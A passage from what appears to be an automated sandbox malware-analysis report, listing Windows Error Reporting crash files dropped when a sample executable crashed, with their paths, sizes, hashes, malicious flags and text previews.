                                                                                        Entropy (8bit):1.042563090908419
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:SoVGAHbO20cb+n6a6chhzuiFIZ24IO8dc:SwLHbscSn6apHzuiFIY4IO8d
                                                                                        MD5:EC71C659BD6A08B3D1278006E7E3ECDF
                                                                                        SHA1:CCE18A8FDD4942680B435086DB64411A4D53129E
                                                                                        SHA-256:B8202A4F15287698F853358FAC54160D2EEAA2BCF5CFC197CB804D6558F5FAE6
                                                                                        SHA-512:56498CDB9717AB07E448840B7C2B480D2CC7509AD70750A827203FB379DC42F305D1BBF73C30F651AF0847BB24D616542031AD2B82215DC189F5312620FC1C25
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.7.2.6.7.7.2.1.8.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.7.2.7.3.9.7.1.8.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.5.8.6.2.3.6.-.1.8.1.8.-.4.9.0.4.-.9.b.e.7.-.c.6.4.6.1.2.b.e.e.9.7.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.2.f.2.7.f.3.-.c.1.f.a.-.4.0.4.2.-.9.4.f.0.-.7.1.b.3.5.1.9.2.6.5.a.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.3.8.-.0.0.0.1.-.0.0.1.4.-.4.7.6.7.-.c.5.5.e.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.f.b.7.7.b.d.0.f.3.7.1.9.4.d.6.d.6.1.a.b.a.1.5.f.f.b.4.8.8.8.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_75a55460d61773bd51cf531a12c409793a627c2_4b931c09_12131765-486c-4f47-856d-fb5b70fab621\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.0410223725671461
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:rwgBUHvcxyb20cb+nRqxaGXL5TzuiFf9Z24IO8HzB:HOyycSnKa+JzuiFFY4IO89
                                                                                        MD5:7A0BCE69001069D8BC495EF499CD2404
                                                                                        SHA1:5EB62D41F24A268AE2B4A0CD8D6805EDA4CB7989
                                                                                        SHA-256:D265D64544AF4566D0FFE83DD08F045726FC610C8C5FE0B20BE27E39DAD62B0C
                                                                                        SHA-512:BC93EA59FAB32DF589BE2C4A574E38D845D290DD0686E77243479598321DA46F236E2C9CA955FAD5BA41A9B7FCFA1C9AADEE2694BABB21D0834EF88FBD9E645F
                                                                                        Malicious:true
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.6.2.0.5.3.3.1.3.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.6.2.1.1.7.3.7.5.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.1.3.1.7.6.5.-.4.8.6.c.-.4.f.4.7.-.8.5.6.d.-.f.b.5.b.7.0.f.a.b.6.2.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.e.1.f.5.c.1.-.2.1.4.e.-.4.f.7.b.-.b.c.f.7.-.c.e.0.6.a.f.8.3.c.4.e.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.9.4.-.0.0.0.1.-.0.0.1.4.-.f.c.0.6.-.5.b.1.f.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.3.a.b.5.b.a.8.4.a.9.9.5.1.f.7.e.b.6.5.b.1.5.6.8.2.3.7.4.2.b.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.d.1.0.a.c.6.9.8.b.e.f.0.3.d.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_75a55460d61773bd51cf531a12c409793a627c2_4b931c09_d7761b0f-1f49-425c-814f-9fe63ef7c766\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.034391585899798
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:FwiB4zHv5/yb20cb+nRqxaichhzuiFf9Z24IO8HzB:6g4jRycSnKaRHzuiFFY4IO89
                                                                                        MD5:6E26BD48FF82691A9502F188B3736B76
                                                                                        SHA1:5E07AD981063E5D4E60CA3DC7B108EFDD2A407F0
                                                                                        SHA-256:416CB54229EC0537294588CCBD87BE66E99CFE5B066F14A431BD3A10D75C3B86
                                                                                        SHA-512:3ECB434DF5644AC79FFEA05A56149106D48B62E32C04A77A0E7B5B845679A476C67C4F28887419CA0889ECF45A6347E1970FE5CB95483F66080D800092839F0A
                                                                                        Malicious:true
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.6.2.8.9.3.1.7.2.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.6.2.9.6.9.7.3.5.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.7.6.1.b.0.f.-.1.f.4.9.-.4.2.5.c.-.8.1.4.f.-.9.f.e.6.3.e.f.7.c.7.6.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.f.b.9.2.1.2.-.6.9.7.2.-.4.c.7.b.-.8.7.f.0.-.9.5.1.0.5.8.9.2.8.0.8.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.c.c.-.0.0.0.1.-.0.0.1.4.-.6.8.d.3.-.7.3.2.4.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.3.a.b.5.b.a.8.4.a.9.9.5.1.f.7.e.b.6.5.b.1.5.6.8.2.3.7.4.2.b.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.d.1.0.a.c.6.9.8.b.e.f.0.3.d.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C95.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:40:47 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):220546
                                                                                        Entropy (8bit):3.8709952393219416
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:SHLgDf4uEqyyGOLTgsGqluJotCnw/gf46:Skj4518TgGFc1f
                                                                                        MD5:3B106A1F56680E397F7576EF5E984946
                                                                                        SHA1:B586D1EF6C2971055123E914E6DBF9F5430941D3
                                                                                        SHA-256:3C8D13E6FADB01D0CB8B5202DCE25495941DEFE06A10A66635DC21E967E86B9C
                                                                                        SHA-512:F3A0C1DC8500BFAEC7EEB509DD80363132A58FB36EAAF20A87BF095B74C1031DCEC7C8B5C022235D1A0BA0A5BD8CB8DA7DF6ADE8C5B2721323E88EDB1E8AC198
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .........Qg............................(.......$............%...I..........`.......8...........T............,...0..........@...........,!..............................................................................eJ.......!......GenuineIntel............T.......(.....Qg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DA0.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8416
                                                                                        Entropy (8bit):3.690385673854538
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJCE6rK6Y9tSU/ZwBCgmfZ//MIrpDQ89bWnksfWaym:R6lXJh6e6Y3SUxkCgmfx/vWnXfJ
                                                                                        MD5:66F3287B03B322C09A3F90F1723B100D
                                                                                        SHA1:58E07AC72CFF04371C59D5E1FB19477745AD1C64
                                                                                        SHA-256:7E58C63D52F20514CFFA767090089BBF2BDCC6BDBE00D7C0D3BB207629D7C71B
                                                                                        SHA-512:6E149B92C9DB8A60EF7E5BC2C888674A7233C68F0CF4867770CAA601DED34382FAD8EBF87F461D5D34787065220DD5DBC8F9CA9AFFDFB84BE589D3BC86C1DFFD
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.8.4.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DC0.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4780
                                                                                        Entropy (8bit):4.47606919670625
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZpJg77aI9LAWpW8VYgYm8M4Ju/7PFn+q8vc/7JJuvC/KBJg2kNd:uIjfdI7V57V4J0K0JuvLg2od
                                                                                        MD5:6909905FFC8BFFA352B0CB0787C51FB3
                                                                                        SHA1:A43AE8EE66FE339DDF8C7E79D829BE1F32F87B72
                                                                                        SHA-256:30D0F8C9D43D57551E988977C11566EB649540DA1D1CCE3666E143A69F00CA7B
                                                                                        SHA-512:5EF990589D7090B45E8D84A1B602BB7C12AD3EA1B96FC39B78D580D74F3878E41378F8491D0812D52E42CF644FEE61D2AAEAEB57086FBF7547A2C6588FCBE1F6
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3CD5.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:43:07 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):228262
                                                                                        Entropy (8bit):3.9235155941035607
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:Ob7TgioCAQd4uEqomLTg7Vrq1KG86rZy7ef:W7U/J44MTg7Vr48sf
                                                                                        MD5:56FEC9E49984E854A2EC2C5DE20DD0DB
                                                                                        SHA1:CAAA8D171E648A68EEE65EA6ABF83FBD13FA6766
                                                                                        SHA-256:4A149E21542130EE906110982478F50CEBDFF0CAF937A8945F7039D20719F41E
                                                                                        SHA-512:2D299FA3FDD636843D1FDFC6F09DD6269A8DBB8C70CEC631F08460D2774556711FDFAD24D38143216C81C9B64928A23EFDA85185644F97DDE6B6C76C9BCED5DE
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .......;.Qg............................(.......<............*...I..........`.......8...........T...........p,..6O..........X...........D!..............................................................................eJ.......!......GenuineIntel............T...........4.Qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DF0.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8398
                                                                                        Entropy (8bit):3.685388185272187
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJRP6vqAe6YEfCSUUcgmfZ//MIrpDT89blbysf8fjm:R6lXJ56U6YEKSUXgmfx/GlbxfM6
                                                                                        MD5:8E1D659138AF66EB91E0E70B973EB001
                                                                                        SHA1:54BA1EC9B292C9AEDAB8DB3278EB662D4208CF20
                                                                                        SHA-256:60098FBC099B5DECC502230E3FD0670364FFFA1D5D0A39CCACB325E7D29D17EF
                                                                                        SHA-512:284536534F236DB2903578F26743333F87950BD87F28844B04EE3C31BDC4D0E1F2674D172DDD7A6509480E5623DF3326F85F81E1ED63A4C27A0C80C3A67A5FE5
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.4.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E37.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:40:56 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):224160
                                                                                        Entropy (8bit):3.976298803735886
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:QJ0EBiDsQ4oI4uEqGLTgVo3OqNYxJjlno2:QJhsJI43Tg47C
                                                                                        MD5:D8C7FDF9A910BC3BB0739F2EB460B3CE
                                                                                        SHA1:A9AE49CECA66DC2622F19192A93A1CCDE9273272
                                                                                        SHA-256:71FF409DAF432B461DB366570066F68B1D91F7E7FF96C185B40B24CD53D52BD6
                                                                                        SHA-512:DDBD0EF3F4FB6530FD95BD9C5ED6D495769C4136EC1EA17992A6A20F966B5718D2FFA5CA8F5C10606DBCBEE3F78DB459C5E4C66CEF3FBF6601D4864AB505942F
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .........Qg............................(.......$...........t*...I..........`.......8...........T............,...?..........@...........,!..............................................................................eJ.......!......GenuineIntel............T.............Qg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E3F.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4780
                                                                                        Entropy (8bit):4.477070785906129
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZDJg77aI9LAWpW8VYlYm8M4Ju/7PFHw+q8vc/7QhGuvC/KBJg2zNd:uIjf7I7V57V5J3KmuvLg2xd
                                                                                        MD5:8085A79DFD6D192F4E3849F9DE7533DE
                                                                                        SHA1:6A4155B51A90289A4F066B9CA8A5CA84076CF1CC
                                                                                        SHA-256:CAF2AA185391CAF9D8F2D6AB4C90A6B99E421F46F40660F6610D0561EC641705
                                                                                        SHA-512:059F8D6254ABB4745FBA2F89831FF55F9E501BAD0051E95EE61A4BB87104C287A0C41A0D1859C1CC85ED312FA6BFE9E276FBA99B9AE8ECA60B2704AE17B99F80
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618345" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER406A.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8416
                                                                                        Entropy (8bit):3.688024465446068
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJxz6eB66Y9KSUhZUJ6gmfZ//MIrpDt89buQsfQ6m:R6lXJF6N6YgSUfw6gmfx/IujfM
                                                                                        MD5:D9183DD5C79609A5A00ED66323B25906
                                                                                        SHA1:0E7883498A430DA732F0B9939C77064FD9ACFB9D
                                                                                        SHA-256:E03C620F5701A6575757F541E6368EF252F86FBCEBD1A5720EEBD823F9784D8C
                                                                                        SHA-512:FFA42770FDB8FD5135AA941702F3740BC48EE5F6FA4FA65D101249481570EBC11ADE7DC8B61FBA259101DE607A53CBD34FB8BDF138506EDD9B34CD0F27E48B8B
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.4.0.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER40B9.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4780
                                                                                        Entropy (8bit):4.475982404524727
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZpJg77aI9LAWpW8VY8Ym8M4Ju/7PFvv7BI+q8vc/7MuvC/KBJg27Nd:uIjfdI7V57VMJ6VIKjuvLg2Jd
                                                                                        MD5:5FB94BC07538E8B7C49AC498067CC099
                                                                                        SHA1:AF6E00EE615A00E2E6C017D7B8CDB15242436620
                                                                                        SHA-256:8F2F7E5B1EAEE8F991FE03F726CD813E16C7351AA3A82CF85D05F9463E83CD17
                                                                                        SHA-512:D71408B716E33D38A684FC729D6797B8BA6FCBF90C1D9B73F77DB61FCE49AFF079D0539061713A31587397EF9207013AE68C826041FD1F1B81CE27342495B3D9
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER5266.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:42:07 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):217468
                                                                                        Entropy (8bit):3.920371364074599
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:tHTzFl1AxN74uEqy1WLTg4WsFL7xTtigeB+:tHtH8F4jeTghs9xn
                                                                                        MD5:D9B7984FD81D1A00889DB239C8A2DBB6
                                                                                        SHA1:D607AA47D3D30AE3D27B8F4BD4C826B5A2CED011
                                                                                        SHA-256:961A6E4A2B19A5FBD58259105C04565D7AC85B1B690E10CEE6D9DB7B1C2C02B0
                                                                                        SHA-512:5C27F050435691CD673B4CBCD715BA9EA2A7FFA9F7788C149166A84B0E052ABDCADCB3838E4DDFE7B22717E6FFE3D3042264267E074603F2760FA591842CA20C
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .........Qg............................(.......<...........$%...I..........`.......8...........T............,...$..........X...........D!..............................................................................eJ.......!......GenuineIntel............T.......8.....Qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER5370.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8398
                                                                                        Entropy (8bit):3.6889699841648307
                                                                                        Encrypted:false
